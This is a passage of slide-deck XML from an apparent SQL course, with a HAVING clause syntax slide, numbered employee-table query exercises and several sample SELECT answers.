                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2660">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The SQL HAVING Clause</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3068" name="Google Shape;3068;p498"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2768700" y="1152475"/>
            <a:ext cx="436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2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column_name(s)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="225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sz="2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="225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sz="2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="225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sz="2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>GROUP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>BY</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column_name(s)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="225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0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>HAVING</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="225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rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ORDER</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>BY</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column_name(s);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900"/>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="Shape 3072"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3073" name="Google Shape;3073;p499"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388025" y="205050"/>
            <a:ext cx="8514600" cy="4733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AutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employe who has highest salary.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display all the employees who has the highest salary in each department</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employe who has the lowest salary</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display all the employees who has the lowest salary in each department</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employe who has the second highest salary</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employe who has the second highest salary in each department</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employe who has the 4th lowest salary</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employe of has 4th highest salary</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employee names of those whose names first letter is capital S.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employee names of those whose names last letter is capital S</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employee names of those whose names contain only small letter S.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the employees who joined in leap year.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the department (dname) with the highest total commission (comm) earned by employees. Include the total commission for each department in the result.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod" startAt="29"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the names of the departments where the average salary of employees in that department is the highest.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>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7" name="Shape 3077"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3078" name="Google Shape;3078;p500"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388025" y="205050"/>
            <a:ext cx="8514600" cy="4733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AutoNum type="arabicPeriod" startAt="43"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the average salary (sal) for each department (deptno), excluding departments where the average salary is greater than the overall average salary of all employees. Additionally, display the department name (dname) and the location (loc) of each department</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod" startAt="43"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the top three employees with the highest average salary, considering only those employees who have been in their current job (job) for at least three years. Include the employee number (empno), employee name (ename), job title (job), and the calculated average salary. Order the results by the average salary in descending order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="Shape 3082"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3083" name="Google Shape;3083;p50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6</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3084" name="Google Shape;3084;p5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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where ename like "J%SH" and (ascii(ename)&gt;=65 and ascii(ename)&lt;=90) and (ascii(substring(ename,length(ename)-1,1)) &gt;=65 and ascii(substring(ename,length(ename)-1,1)) &lt;=90 ) and (ascii(substring(ename,length(ename),1)) &gt;=65 and ascii(substring(ename,length(ename),1)) &lt;=90);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> select * from emp where ename like "J%SH" and (ascii(ename) between 65 and 90) and (ascii(substring(ename,length(ename)-1,1)) between 65 and 90) and (ascii(substring(ename,length(ename),1)) between 65 and 90);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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p50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7</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3090" name="Google Shape;3090;p502"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="1304875"/>
            <a:ext cx="8857200" cy="69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lang="en" sz="1495">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select ename,job,sal,comm from emp where (job='manager' or job='salesman') AND (comm &gt;= 2000 ) ;</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3091" name="Google Shape;3091;p502"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="43581" l="0" r="4287" t="21451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1948650"/>
            <a:ext cx="8780126" cy="1804275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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5" name="Shape 3095"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3096" name="Google Shape;3096;p50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8</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3097" name="Google Shape;3097;p503"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="880900"/>
            <a:ext cx="8857200" cy="90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395">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from emp where deptno=10 order by sal desc;</a:t>
            </a:r>
            <a:endParaRPr sz="2395">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3098" name="Google Shape;3098;p503"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20936" l="0" r="10185" t="20515"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="161700" y="1782400"/>
            <a:ext cx="8817250" cy="32331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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="110800"/>
            <a:ext cx="875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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the difference between &gt;&gt; and &gt; ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;388;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21638" l="34310" r="10455" t="18488"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115250" y="720650"/>
            <a:ext cx="6990998" cy="4262825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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2" name="Shape 3102"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3103" name="Google Shape;3103;p50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9</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3104" name="Google Shape;3104;p504"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="1304875"/>
